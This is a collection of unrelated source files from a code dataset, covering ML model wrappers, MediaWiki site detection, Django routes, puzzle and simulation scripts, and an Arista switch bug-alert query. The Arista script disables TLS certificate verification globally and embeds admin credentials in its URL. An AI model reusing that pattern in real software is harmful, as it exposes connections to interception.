LOGISTIC,RF,SVM,KNN,ADABOOST,XGBOOST,CATBOOST\r\n testX -> array-like(supported by Sklearn), test data. Ignored if testTrainSplit is passed\r\n testY -> array-like(supported by Sklearn), test data. Ignored if testTrainSplit is passed\r\n testTrainSplit -> float, ratio passed will be the amount of test data.\r\n hyperParams -> dictionary, Hyper parameters specific to the model passed. If passed CV is performed.\r\n performCV -> bool, Used when hyperParams not passed to perform plain CV.\r\n folds -> int, No of folds to be used for CV.\r\n scoring -> str, Evaluation metric. Currently supported values: r2,neg_mean_squared_error. If not passed r2 is used.\r\n targetEncodeCols -> List. List of columns to target encode.\r\n modelParams -> dictionary, Any model specific parameters can be passed as dictionary.\r\n\r\n \"\"\"\r\n\r\n def __init__(self, X, Y, model, modelParams = None, testX = None, testY = None,testTrainSplit = None,\r\n folds = 5, hyperParams = None,scoring = None, performCV = None, targetEncodeCols = None):\r\n if (modelParams is None):\r\n modelParams = {}\r\n super().__init__(\r\n X = X, Y = Y, model=model,modelParams = modelParams,testX=testX, testY=testY, testTrainSplit=testTrainSplit,\r\n folds=folds, hyperParams=hyperParams,scoring=scoring, performCV=performCV, targetEncodeCols = targetEncodeCols,\r\n )\r\n self.scoreToFuncDict = self.__getScoreToFuncDict()\r\n if(not self.scoring):\r\n self.scoring = 'r2'\r\n\r\n\r\n def getTestTrainSlipt(self):\r\n ## If both testX and testTrainSplit are not passed throw exception.\r\n if ((self.testX is None) and (self.testTrainSplit is None)):\r\n raise Exception(\"Please pass testX or testTrainSplit\")\r\n\r\n if (self.targetEncodeCols):\r\n for col in self.targetEncodeCols:\r\n encoder = TargetEncoder()\r\n self.X[col] = encoder.fit_transform(self.X[col])\r\n if (self.testX):\r\n self.testX[col] = encoder.fit_transform(self.testX[col])\r\n\r\n if(self.testTrainSplit):\r\n X_train, X_test, y_train, y_test = train_test_split(self.X, self.Y, test_size=self.testTrainSplit, random_state=7)\r\n return X_train, X_test, y_train, y_test\r\n else:\r\n return self.X, self.testX, self.Y, self.testY\r\n\r\n\r\n def fit(self):\r\n super().fit()\r\n\r\n def test(self):\r\n super().test()\r\n\r\n def predict(self):\r\n \"\"\"\r\n Returns score and predictions.\r\n \"\"\"\r\n if (self.testY is None):\r\n return 0, self.test()\r\n\r\n preds = self.bestEstimator.predict(self.testX)\r\n res = getattr(sklearn.metrics, self.scoreToFuncDict[self.scoring])(self.testY, preds)\r\n print(self.model, self.scoring, res)\r\n return res, preds\r\n\r\n def newDataPredict(self, testData):\r\n super().newDataPredict(testData)\r\n\r\n def getEstimatorModel(self):\r\n\r\n modelToClassMapper = {\r\n \"LINEAR\" : LinearRegression(),\r\n \"RF\" : RandomForestRegressor(),\r\n \"SVM\" : SVR(),\r\n \"KNN\" : KNeighborsRegressor(),\r\n \"ADABOOST\" : AdaBoostRegressor(),\r\n \"XGBOOST\" : XGBRegressor(),\r\n \"CATBOOST\" : CatBoostRegressor(),\r\n }\r\n\r\n if(self.model not in modelToClassMapper):\r\n raise Exception(\"Please pass a valid model from: LINEAR,RF,SVM,KNN,ADABOOST,XGBOOST,CATBOOST\")\r\n else:\r\n cls = modelToClassMapper[self.model]\r\n if ((self.model == \"CATBOOST\") and ('logging_level' not in self.modelParams)):\r\n self.modelParams['logging_level'] = 'Silent'\r\n\r\n return cls.set_params(**self.modelParams)\r\n\r\n def __getScoreToFuncDict(self):\r\n\r\n scoreToFuncDict = {\r\n \"r2\": 'r2_score',\r\n \"neg_mean_squared_error\" : 'mean_squared_error'\r\n }\r\n\r\n return scoreToFuncDict\r\n\r\n\r\n","sub_path":"OnePiecePredictor/OnePieceRegression.py","file_name":"OnePieceRegression.py","file_ext":"py","file_size_in_byte":4948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"342386941","text":"# -*- coding: utf-8 -*-\n\"\"\"Classes for detecting a MediaWiki site.\"\"\"\n#\n# (C) Pywikibot team, 2010-2015\n#\n# Distributed under the terms of the MIT license.\n#\nfrom __future__ import unicode_literals\n\n__version__ = '$Id$'\n#\n\nimport json\nimport re\nimport sys\n\nfrom collections import defaultdict\nfrom distutils.version import LooseVersion as V\n\nfrom pywikibot.tools import PY2, PYTHON_VERSION\n\nif not PY2:\n from html.parser import HTMLParser\n from urllib.parse import urljoin\n from urllib.error import HTTPError\n import urllib.request as urllib2\nelse:\n from HTMLParser import HTMLParser\n from urlparse import urljoin\n from urllib2 import HTTPError\n import urllib2\n\n\ndef urlopen(url):\n req = urllib2.Request(\n url,\n headers={'User-agent': 'Pywikibot Family File Generator 2.0'\n ' - https://www.mediawiki.org/wiki/Pywikibot'})\n uo = urllib2.urlopen(req)\n try:\n if sys.version_info[0] > 2:\n uo.charset = uo.headers.get_content_charset()\n else:\n uo.charset = uo.headers.getfirstmatchingheader('Content-Type')[0].strip().split('charset=')[1]\n except IndexError:\n uo.charset = 'latin-1'\n return uo\n\n\nclass MWSite(object):\n\n \"\"\"Minimal wiki site class.\"\"\"\n\n REwgEnableApi = re.compile(r'wgEnableAPI ?= ?true')\n REwgServer = re.compile(r'wgServer ?= ?\"([^\"]*)\"')\n REwgScriptPath = re.compile(r'wgScriptPath ?= ?\"([^\"]*)\"')\n REwgArticlePath = re.compile(r'wgArticlePath ?= ?\"([^\"]*)\"')\n REwgContentLanguage = re.compile(r'wgContentLanguage ?= ?\"([^\"]*)\"')\n REwgVersion = re.compile(r'wgVersion ?= ?\"([^\"]*)\"')\n\n def __init__(self, fromurl):\n self.fromurl = fromurl\n if fromurl.endswith(\"$1\"):\n fromurl = fromurl[:-2]\n try:\n uo = urlopen(fromurl)\n data = uo.read().decode(uo.charset)\n except HTTPError as e:\n if e.code != 404:\n raise\n data = e.read().decode('latin-1') # don't care about mojibake for errors\n pass\n\n wp = WikiHTMLPageParser()\n wp.feed(data)\n try:\n self.version = wp.generator.replace(\"MediaWiki \", \"\")\n except Exception:\n self.version = \"0.0\"\n\n if V(self.version) < V(\"1.17.0\"):\n self._parse_pre_117(data)\n else:\n self._parse_post_117(wp, fromurl)\n\n @property\n def langs(self):\n data = urlopen(\n self.api +\n \"?action=query&meta=siteinfo&siprop=interwikimap&sifilteriw=local&format=json\")\n iw = json.loads(data.read().decode(data.charset))\n if 'error' in iw:\n raise RuntimeError('%s - %s' % (iw['error']['code'],\n iw['error']['info']))\n self.langs = [wiki for wiki in iw['query']['interwikimap']\n if u'language' in wiki]\n return self.langs\n\n def _parse_pre_117(self, data):\n if not self.REwgEnableApi.search(data):\n print(\"*** WARNING: Api does not seem to be enabled on %s\"\n % self.fromurl)\n try:\n self.version = self.REwgVersion.search(data).groups()[0]\n except AttributeError:\n self.version = None\n\n self.server = self.REwgServer.search(data).groups()[0]\n self.scriptpath = self.REwgScriptPath.search(data).groups()[0]\n self.articlepath = self.REwgArticlePath.search(data).groups()[0]\n self.lang = self.REwgContentLanguage.search(data).groups()[0]\n\n if self.version is None:\n # try to get version using api\n try:\n d = json.load(urlopen(self.api + \"?version&format=json\"))\n self.version = filter(\n lambda x: x.startswith(\"MediaWiki\"),\n [l.strip()\n for l in d['error']['*'].split(\"\\n\")])[0].split()[1]\n except Exception:\n pass\n\n def _parse_post_117(self, wp, fromurl):\n apipath = wp.edituri.split(\"?\")[0]\n fullurl = urljoin(fromurl, apipath)\n data = urlopen(fullurl + \"?action=query&meta=siteinfo&format=json\")\n info = json.loads(data.read().decode(data.charset))['query']['general']\n self.server = urljoin(fromurl, info['server'])\n for item in ['scriptpath', 'articlepath', 'lang']:\n setattr(self, item, info[item])\n\n def __cmp__(self, other):\n return (self.server + self.scriptpath ==\n other.server + other.scriptpath)\n\n def __hash__(self):\n return hash(self.server + self.scriptpath)\n\n @property\n def api(self):\n return self.server + self.scriptpath + \"/api.php\"\n\n @property\n def iwpath(self):\n return self.server + self.articlepath\n\n\nclass WikiHTMLPageParser(HTMLParser):\n\n \"\"\"Wiki HTML page parser.\"\"\"\n\n def __init__(self):\n if PYTHON_VERSION < (3, 4):\n HTMLParser.__init__(self)\n else:\n super().__init__(convert_charrefs=True)\n self.generator = None\n\n def handle_starttag(self, tag, attrs):\n attrs = defaultdict(lambda: None, attrs)\n if tag == \"meta\":\n if attrs[\"name\"] == \"generator\":\n self.generator = attrs[\"content\"]\n if tag == \"link\":\n if attrs[\"rel\"] == \"EditURI\":\n self.edituri = attrs[\"href\"]\n","sub_path":"pywikibot/site_detect.py","file_name":"site_detect.py","file_ext":"py","file_size_in_byte":5382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"135679968","text":"from django.conf import urls\nfrom rest_framework import urlpatterns as up\nfrom rest_framework import renderers\nfrom trails import views\n\n\nsign_list = views.SignViewSet.as_view({\n 'get': 'list',\n 'post': 'create'\n})\n\nsign_detail = views.SignViewSet.as_view({\n 'get': 'retrieve',\n 'put': 'update',\n 'delete': 'destroy'\n})\n\ncamp_list = views.CampViewSet.as_view({\n 'get': 'list',\n 'post': 'create'\n})\n\ncamp_detail = views.CampViewSet.as_view({\n 'get': 'retrieve',\n 'put': 'update',\n 'delete': 'destroy'\n})\n\nurlpatterns = [\n urls.url(r'^$',\n views.TrailsInfo.as_view(),\n name='trails-info'),\n urls.url(r'^signs$',\n sign_list,\n name='signs-list'),\n urls.url(r'^signs/(?P[0-9a-z-]{36})$',\n sign_detail,\n name='signs-detail'),\n urls.url(r'^camps$',\n camp_list,\n name='camps-list'),\n urls.url(r'^camps/(?P[0-9a-z-]{36})$',\n camp_detail,\n name='camps-detail'),\n]\n\nurlpatterns = up.format_suffix_patterns(urlpatterns)\n","sub_path":"wire_hobo/trails/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"191530629","text":"#------------------------------------------------------------------------------------------------#\n#\n# The dictionary that we create here, is a dictionary that has for keys all the possible sums\n# that can be created by the summation of all the combinations* of numbers in [1, MAX_NUMBER].\n# *In these combinations, a number can occur only once.\n#\n\n\nMAX_NUMBER = 9 # max number that can participate in the sum\nsumcombo = dict()\n\ndef createSumComboFile():\n \n min_possible_sum = 1\n max_possible_sum = sum([i for i in range(1, MAX_NUMBER + 1)])\n \n # For each possible sum, it adds it as an entry-key to the dictionary `sumcombo`.\n # \n for i in range(min_possible_sum, max_possible_sum + 1):\n sumcombo[i] = list()\n \n # For each plural number of all the combinations\n #\n for number_of_variables in range(1, MAX_NUMBER + 1):\n recursion(1, 1, [0 for i in range(number_of_variables)])\n\n # The dictionary is filled, and now, we can write it to a file ;)\n #\n f = open('sumcombo.py', 'w')\n write_dictionary(f, sumcombo)\n f.close()\n\n\n# 1st argument: which is the current variable that we set.\n# 2nd argument: which is the minimum value that `var` can take.\n# 3rd argument: a list that temporary holds the combos of `len(LIST)` variables.\n# \ndef recursion(var, minval, LIST):\n if var > len(LIST): #> If we reached the end of `LIST` (means `LIST` is filled with values):\n sumcombo[sum(LIST)].append(LIST[:]) #> we add this sum combination to the dictionary.\n return\n to = MAX_NUMBER - (len(LIST) - var)\n for i in range(minval, to+1):\n LIST[var-1] = i\n recursion(var+1, i+1, LIST)\n\n\n\n\n\n\ndef write_dictionary(f, D):\n f.write('# The dictionary `sumcombo` contains for each , all the combinations that\\n'\\\n '# can occur by numbers from 1 to {0} that sum to and every number appears\\n'\\\n '# in the combination only (at most) once.\\n#\\n'.format(MAX_NUMBER))\n \n f.write('sumcombo = {')\n keys = D.keys()\n f.write('\\\\\\n{0}: '.format(keys[0]))\n write_tuple(f, D[keys[0]])\n for i in range(1, len(keys)):\n f.write(',\\\\\\n{0}: '.format(keys[i]))\n write_tuple(f, D[keys[i]])\n f.write('\\\\\\n}\\n')\n\ndef write_tuple(f, L):\n f.write('(')\n write_frozenset(f, L[0])\n if len(L) == 1: # Because tuples with one element, must be written as `(elem1,)`\n f.write(',') # to be read as tuples, eg. \"(1) is read `1`\", \"(1,) is read `(1)`\"\n for i in range(1, len(L)):\n f.write(', ')\n write_frozenset(f, L[i])\n f.write(')')\n\ndef write_frozenset(f, L):\n f.write('frozenset([{0}'.format(L[0]))\n for i in range(1, len(L)):\n f.write(', {0}'.format(L[i]))\n f.write('])')\n\n\n\n\n\nif __name__ == \"__main__\":\n createSumComboFile()\n\n\n\n\n\n\n\n\n","sub_path":"(2011) Artificial Intelligence/kakuro [python]/create_file_sumcombo.py","file_name":"create_file_sumcombo.py","file_ext":"py","file_size_in_byte":2868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"169139358","text":"# -*- encoding:utf-8 -*-\nfrom odoo import api\nfrom odoo import fields, models\n\n\nclass PregnantCycle(models.Model):\n _name = 'his.pregnant_cycle'\n _description = '孕周'\n update_external = True # 更新外部服务器数据\n\n @api.model\n def _default_get_value(self):\n cycle = self.search([], order='value desc', limit=1)\n if cycle:\n return cycle.value + 1\n\n return 1\n\n name = fields.Char('名称')\n value = fields.Integer('距怀孕周数', default=_default_get_value)\n\n\n _sql_constraints = [\n ('value_uniq', 'unique (value)', '怀孕周数重复')\n ]\n\n @api.onchange('value')\n def onchange_value(self):\n if self.value < 1:\n return {\n 'warning': {\n 'title': '距怀孕周数错误',\n 'message': \"距怀孕周数必须大于等于1\"\n }\n }\n\n self.name = u'第%d周' % self.value\n\n\n","sub_path":"his_pregnant/models/pregnant_cycle.py","file_name":"pregnant_cycle.py","file_ext":"py","file_size_in_byte":957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"272076471","text":"import math\nimport random\nfrom collections import namedtuple\n\nfrom numba import jit\n\nfrom dan.lib.helper import Vec3\n\n_node_id = 0\n\n# TODO: nested rings?\n\nclass NodeData:\n def __init__(self, node):\n self.pos = Vec3(node.pos)\n self.id = node.id\n self.prev = node.prev.id\n self.next = node.next.id\n\n # This is a helper field for trianglulation\n self.opposite = None\n\n@jit(nopython=True)\ndef numba_push(ax, ay, bx, by, max_dist, scalar):\n dx = ax - bx\n dy = ay - by\n \n d2 = (dx*dx) + (dy*dy)\n\n if d2 > max_dist ** 2:\n return (0, 0)\n\n d = math.sqrt(d2)\n dxn = dx / d\n dyn = dy / d\n\n mag = ((1 / (d*d)) * scalar)\n return (dxn * mag, dyn * mag)\n\nclass Node:\n NEIGHBOR_DISTANCE = 3\n NEIGHBOR_PUSH_SCALAR = 0.05\n OTHER_PUSH_SCALAR = 8\n OTHER_RING_PUSH_SCALAR = 3\n MAX_DIST_OTHER = NEIGHBOR_DISTANCE * 5\n\n def __init__(self, x, y, ring_index):\n global _node_id\n self.pos = Vec3(x, y)\n self.pos_next = Vec3(self.pos)\n self.prev = None\n self.next = None\n self.ring_index = ring_index\n\n self.id = _node_id\n _node_id += 1\n\n def set_prev(self, node):\n if self.prev != node:\n self.prev = node\n node.set_next(self)\n\n def set_next(self, node):\n if self.next != node:\n self.next = node\n node.set_prev(self)\n\n def update(self, rings):\n # Maintain distance from neighbors\n self.pos_next.set(self.pos)\n\n self.neighbor_push(self.prev)\n self.neighbor_push(self.next)\n\n for ring_index, nodes in enumerate(rings):\n if self.ring_index == ring_index:\n scalar = Node.OTHER_PUSH_SCALAR\n else:\n scalar = Node.OTHER_RING_PUSH_SCALAR\n for node in nodes:\n if node in (self.next, self.prev, self):\n continue\n\n self.other_push(node, scalar)\n \n\n def other_push(self, node, scalar):\n dx, dy = numba_push(self.pos.x, self.pos.y, node.pos.x, node.pos.y, self.MAX_DIST_OTHER, scalar)\n self.pos_next.x += dx\n self.pos_next.y += dy\n\n # vec = self.pos - node.pos\n # distance2 = vec.length2()\n\n # if distance2 > self.MAX_DIST_OTHER ** 2:\n # return\n\n # distance = math.sqrt(distance2)\n # vec_norm = Vec3(vec)\n # vec_norm /= distance\n\n # push_force = vec_norm * ((1 / (distance*distance)) * scalar)\n\n # self.pos_next += push_force\n\n def neighbor_push(self, node):\n vec = self.pos - node.pos\n distance = vec.length()\n vec_norm = Vec3(vec)\n vec_norm /= distance\n\n distance_from_optimal = distance - self.NEIGHBOR_DISTANCE\n push_force = vec_norm * (distance_from_optimal * self.NEIGHBOR_PUSH_SCALAR)\n push_force *= -1\n\n self.pos_next += push_force\n\n def __repr__(self):\n return \"\".format(\n self.id, self.prev.id, self.next.id\n )\n\nRingDefinition = namedtuple('RingDefinition', ['radius', 'growth_rate'])\n\nclass DiffLine:\n def __init__(self):\n self.roots = []\n self.rings = []\n random.seed(0)\n\n def init_circle(self):\n self.ring_defs = [\n RingDefinition(4, .9),\n RingDefinition(8, .5),\n ]\n\n for ring_index, ring_def in enumerate(self.ring_defs):\n num_points = math.floor((ring_def.radius * math.pi * 2) / Node.NEIGHBOR_DISTANCE)\n\n root = Node(ring_def.radius, 0, ring_index)\n self.roots.append(root)\n nodes = []\n nodes.append(root)\n previous = root\n for i in range(1, num_points):\n a = (i / num_points) * math.pi * 2\n node = Node(math.cos(a) * ring_def.radius, math.sin(a) * ring_def.radius, ring_index)\n nodes.append(node)\n previous.set_next(node)\n previous = node\n previous.set_next(root)\n self.rings.append(nodes)\n\n def insert_node(self):\n for ring_index, nodes in enumerate(self.rings):\n ring_def = self.ring_defs[ring_index]\n if random.random() < ring_def.growth_rate:\n insert_index = random.randint(1, len(nodes) - 1)\n prev = nodes[insert_index]\n next = prev.next\n\n node = Node((prev.pos.x + next.pos.x) * 0.5, (prev.pos.y + next.pos.y) * 0.5, ring_index)\n nodes.insert(insert_index + 1, node)\n prev.set_next(node)\n next.set_prev(node)\n\n def update(self):\n self.insert_node()\n\n # for i, node in enumerate(self.nodes):\n # if self.nodes[(i + 1) % len(self.nodes)] != node.next:\n # raise Exception\n\n for nodes in self.rings:\n for node in nodes:\n node.update(self.rings)\n\n for nodes in self.rings:\n for node in nodes:\n node.pos = node.pos_next","sub_path":"dan/project/slicestack/differential_line.py","file_name":"differential_line.py","file_ext":"py","file_size_in_byte":5066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"582989878","text":"# epochs 100\n# validation_split, callback\n# early_stopping 5\n# Reduce LR 3\n# modelcheckpoint hdf5 save\n\nimport numpy as np\nfrom tensorflow.keras.models import Sequential, Model\nfrom tensorflow.keras.layers import Dense, Dropout, Input, Conv2D\nfrom tensorflow.keras.datasets import mnist\n\n(x_train, y_train), (x_test, y_test) = mnist.load_data()\n\n# 1\nfrom tensorflow.keras.utils import to_categorical\ny_train = to_categorical(y_train)\ny_test = to_categorical(y_test)\n\nx_train = x_train.reshape(60000, 28*28).astype('float32')/255.\nx_test = x_test.reshape(10000, 28*28).astype('float32')/255.\n\n# 2\ndef build_model(drop = 0.5, optimizer = 'adam'):\n inputs = Input(shape=(28*28,), name='input')\n x = Dense(512, activation='relu', name='hidden1')(inputs)\n x = Dropout(drop)(x)\n x = Dense(256, activation='relu', name='hidden2')(x)\n x = Dropout(drop)(x)\n x = Dense(128, activation='relu', name='hidden3')(x)\n x = Dropout(drop)(x)\n outputs = Dense(10, activation='softmax', name='output')(x)\n model = Model(inputs=inputs, outputs=outputs)\n model.compile(optimizer=optimizer, metrics=['acc'], loss='categorical_crossentropy')\n\n return model\n\ndef create_hyperparameters():\n batches = [10, 20, 30, 40, 50]\n optimizers = ['rmsprop', 'adam', 'adadelta']\n dropout = [0.1, 0.2, 0.3]\n return {\"batch_size\":batches, \"optimizer\":optimizers, \"drop\":dropout}\nhyperparameters = create_hyperparameters()\n# model2 = build_model()\n\nfrom tensorflow.keras.wrappers.scikit_learn import KerasClassifier\nmodel2 = KerasClassifier(build_fn=build_model, verbose=1)\n\nfrom sklearn.model_selection import GridSearchCV, RandomizedSearchCV\nsearch = RandomizedSearchCV(model2, hyperparameters, cv = 3)\n# search = GridSearchCV(model2, hyperparameters, cv = 3)\n\nfrom tensorflow.keras.callbacks import EarlyStopping, ModelCheckpoint, ReduceLROnPlateau\nmodelpath = '../data/modelcheckpoint/k61_mnist_{epoch:02d}-{val_loss:.4f}.hdf5'\ncp = ModelCheckpoint(filepath=modelpath, monitor='val_loss', save_best_only=True, mode='auto')\nes = EarlyStopping(monitor='val_loss', patience=5)\nreduce_lr = ReduceLROnPlateau(monitor='val_loss', patience=3, factor=0.5, verbose=1)\n\nsearch.fit(x_train, y_train, verbose=1, epochs=100, validation_split=0.2, callbacks=[es, reduce_lr, cp])\nprint(search.best_params_) # ㄴㅐㄱㅏ ㅅㅓㄴㅌㅐㄱㅎㅏㄴ ㅍㅏㄹㅏㅁㅣㅌㅓ ㅈㅜㅇㅇㅔㅅㅓ\nprint(search.best_estimator_) # ㅈㅓㄴㅊㅔ ㅍㅏㄹㅏㅁㅣㅌㅓ ㅈㅜㅇㅇㅔㅅㅓ\nprint(search.best_score_)\nacc = search.score(x_test, y_test)\nprint(\"final score : \", acc)\n\n# {'optimizer': 'rmsprop', 'drop': 0.1, 'batch_size': 40}\n# \n# 0.958816667397817\n# 250/250 [==============================] - 0s 910us/step - loss: 0.1148 - acc: 0.9696\n# final score : 0.9696000218391418","sub_path":"keras2/keras61_4_epochs.py","file_name":"keras61_4_epochs.py","file_ext":"py","file_size_in_byte":2874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"39446111","text":"import pandas\nimport math\nimport numpy\nfrom sklearn.metrics import roc_auc_score\n\ndef main():\n\tdata = pandas.read_csv('./data/logistic-regression.csv', header=None)\n\tx = data.ix[:, 1:].as_matrix()\n\ty = data.ix[:, 0]\n\t\n\tweights_without_reg = gradient(x, y)\n\tweights_with_reg = gradient(x, y, 10)\n\n\t# print(weights_without_reg)\n\t# print(weights_with_reg)\n\n\tpredictions_without_reg = [x[:,0][i] * weights_without_reg[0] + x[:,1][i] * weights_without_reg[1] for i, v in enumerate(y) ]\n\tpredictions_with_reg = [x[:,0][i] * weights_with_reg[0] + x[:,1][i] * weights_with_reg[1] for i, v in enumerate(y) ]\n\n\tscore_without_reg = roc_auc_score(y, predictions_without_reg)\n\tscore_with_reg = roc_auc_score(y, predictions_with_reg)\n\n\tanswer = str(numpy.round(score_without_reg, 3)) + \" \" + str(numpy.round(score_with_reg, 3))\n\n\tsubmission_file = open('submissions/logistic-regression/scores.txt', 'w+')\n\tsubmission_file.write(answer)\n\tsubmission_file.close()\n\n\tprint(answer)\n\n\n\ndef gradient(x, y, regularization_coef = 0):\n\tlearning_rate = 0.1\n\tconvergence_criteria = 1e-5\n\tmax_iterations_left = 10**5\n\tcurrent_distance = float(\"inf\")\n\tw_1 = 0\n\tw_2 = 0\n\tl = len(y)\n\n\twhile current_distance > convergence_criteria and max_iterations_left > 0:\n\t\ttmp_w_1, tmp_w_2 = w_1, w_2\n\n\t\tw_1 = w_1 + (learning_rate/l) * sum( [y[i] * x[:,0][i] * (1 - 1/( 1 + math.exp( -y[i] * ( tmp_w_1 * x[:,0][i] + tmp_w_2 * x[:,1][i]) ) ) ) for i, v in enumerate(y)] ) - learning_rate * regularization_coef * w_1\n\t\tw_2 = w_2 + (learning_rate/l) * sum( [y[i] * x[:,1][i] * (1 - 1/( 1 + math.exp( -y[i] * ( tmp_w_1 * x[:,0][i] + tmp_w_2 * x[:,1][i]) ) ) ) for i, v in enumerate(y)] ) - learning_rate * regularization_coef * w_2\n\n\t\tmax_iterations_left -= 1\n\t\tcurrent_distance = math.sqrt( (w_1 - tmp_w_1)**2 + (w_2 - tmp_w_2)**2 )\n\t\t# print(current_distance)\n\n\treturn (w_1, w_2)\n\nif __name__ == '__main__':\n\tmain()","sub_path":"tasks/logistic-regression/logistic-regression.py","file_name":"logistic-regression.py","file_ext":"py","file_size_in_byte":1872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"41705547","text":" # * Copyright (C) 2017 Arista Networks, Inc.\n # * Use of this source code is governed by the Apache License 2.0\n # * that can be found in the COPYING file.\n\nfrom jsonrpclib import Server\nimport ssl\nimport json\nhost = '10.85.128.153'\nuser = 'admin'\npasswd = ''\n\nurl = \"https://{}:{}@{}/command-api\".format(user,passwd,host)\nssl._create_default_https_context = ssl._create_unverified_context\ncvxreq = Server(url)\n\ndef sw_mac():\n resp = cvxreq.runCmds(1,[\"show cvx connections brief\"])\n n = 0\n macs = []\n for x in resp[0][\"connections\"]:\n \tsw_mac = resp[0][\"connections\"][n][\"switchId\"]\n \tmacs.append(sw_mac)\n \tn += 1\n return macs\n\ndef client_host_names():\n resp = cvxreq.runCmds(1,[\"show cvx connections brief\"])[0]['connections']\n hostnames = []\n for rows in resp:\n for key, value in rows.items():\n if key == 'hostname':\n hostnames.append(value)\n return hostnames\n\ndef bugalerts(mac):\n op = {}\n resp = cvxreq.runCmds(1,[\"show service bug-alert report switch mac %s\" %mac])\n eos = resp[0][\"switches\"][mac][\"eosVersion\"].replace(\"'\",\"\")\n hostname = resp[0][\"switches\"][mac][\"hostname\"]\n bugs = resp[0][\"switches\"][mac][\"bugExposureList\"]\n buglist = []\n for bug in bugs:\n bug_det = resp[0][\"bugs\"][str(bug)][\"bugSummary\"]\n ver_intro = resp[0][\"bugs\"][str(bug)][\"versionsIntroduced\"]\n ver_fix = resp[0][\"bugs\"][str(bug)][\"versionsFixed\"]\n buglist.append({'bugid':bug,'details':bug_det,'ver_intro':ver_intro,'ver_fix':ver_fix})\n op['mac'] = mac\n op['host'] = hostname\n op['eos'] = eos\n op['bugdata'] = buglist\n # op.append({'mac':mac,'host':hostname,'eos':eos,'bugdata':buglist})\n return op\n\ndef get_all_bugs():\n resp = cvxreq.runCmds(1,[\"show service bug-alert detail bugs\"])\n hostnames = client_host_names()\n buglist = []\n for bugid,bugdata in resp[0]['bugs'].iteritems():\n buglist.append(bugid)\n return buglist\n\ndef main():\n macs = sw_mac()\n result = []\n for mac in macs:\n mac = mac.replace(':','-')\n op = bugalerts(mac)\n result.append(op)\n return result\n","sub_path":"bugalerts.py","file_name":"bugalerts.py","file_ext":"py","file_size_in_byte":2145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"593872951","text":"from bot import bot\nimport config\nimport data_b\nimport get_weather\nimport buttons\n\n\n@bot.message_handler(commands=['start'])\ndef start(message):\n sti = open('static/AnimatedSticker.tgs', 'rb')\n bot.send_sticker(message.chat.id, sti)\n bot.send_message(message.chat.id, 'Hello! What city do you live in ?')\n\n\n@bot.message_handler(commands=['help'])\ndef helper(message):\n bot.send_message(message.chat.id,\n '''Commands:\\nget - for get info about user.\\nadd (your city) - add\\\n or create new user.\\ndel (your city) - delete user.\\nupdate (your city) - update user.''')\n\n\n@bot.message_handler(commands=['get'])\ndef get(message):\n bot.send_message(message.chat.id, data_b.get_user(message.chat.id))\n\n\n@bot.message_handler(commands=['add'])\ndef add(message):\n if data_b.add_user(message.chat.id, message.text[5:]):\n bot.send_message(message.chat.id, 'Added.', reply_markup=buttons.city_button(message.text[5:]))\n\n\n@bot.message_handler(commands=['update'])\ndef update(message):\n if data_b.update_user(message.chat.id, message.text[8:]):\n bot.send_message(message.chat.id, 'Updated.',\n reply_markup=buttons.city_button(message.text[8:]))\n\n\n@bot.message_handler(commands=['del'])\ndef delete(message):\n if data_b.del_user(message.chat.id, message.text[5:]):\n bot.send_message(message.chat.id, 'Deleted.')\n\n\n@bot.message_handler(content_types=['text'])\ndef change(message):\n bot.send_message(message.chat.id, get_weather.get_weather_info(message.text))\n\n\nif __name__ == '__main__':\n bot.polling(none_stop=True)\n","sub_path":"weather_handler.py","file_name":"weather_handler.py","file_ext":"py","file_size_in_byte":1594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"191088694","text":"from functools import*;\r\n\r\ndef implist():\r\n\t\r\n\tarr1 =list();\r\n\r\n\tno1 = int(input(\"Enter number of elements wnt put into list \"));\r\n\r\n\tprint(\"Enter element in list \");\r\n\r\n\tfor i in range(no1):\r\n\r\n\t\tno2 = int(input(\"Number: \"));\r\n\r\n\t\tarr1.append(no2);\r\n\r\n\treturn(arr1);\r\n\r\n\r\ndef fun(no):\r\n\t\r\n\ta = 0;\r\n\tfor i in range(no):\r\n\t\tif(no % (i+1) == 0):\r\n\t\t\ta = a+1;\r\n\tif a <= 2:\r\n\t\treturn(no);\r\n\t\r\n\r\ndef gun(no):\r\n\r\n\treturn(no * 2);\r\n\r\ndef man(no1,no2):\r\n\tmax = no1;\r\n\r\n\tif (no1 < no2):\r\n\t\tmax = no2;\r\n\treturn(max);\r\n\r\ndef main():\r\n\t\r\n\tarr = list(implist());\r\n\t\r\n\tprint(\"Entered list is \",arr); \r\n\r\n\tlist1 = list(filter(fun,arr));\r\n\r\n\tprint(\"prime numbers are\",list1);\r\n\r\n\tlist2 = list(map(gun,list1));\r\n\r\n\tprint(\"Squre of all numbers\",list2);\r\n\r\n\tproduct = reduce(man,list2);\r\n\r\n\tprint(\"Addition of all elements\",product);\r\n\r\n\r\n\r\n\r\nif(__name__ ==\"__main__\"):\r\n\r\n\tmain();\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"Assignment 4/Filter_map_reduce_3.py","file_name":"Filter_map_reduce_3.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"552975236","text":"import random\n\nheads = 0\ntails = 0\nsides = 0\n\nfor i in range(0,100):\n flip = random.randint(0, 2)\n\n if flip == 0:\n heads += 1\n elif flip == 1:\n tails += 1\n else:\n sides += 1\n\nprint(\"Heads count %i\" % heads)\nprint(\"Tails count %i\" % tails)\nprint(\"Sides count %i\" % sides)","sub_path":"coin counter 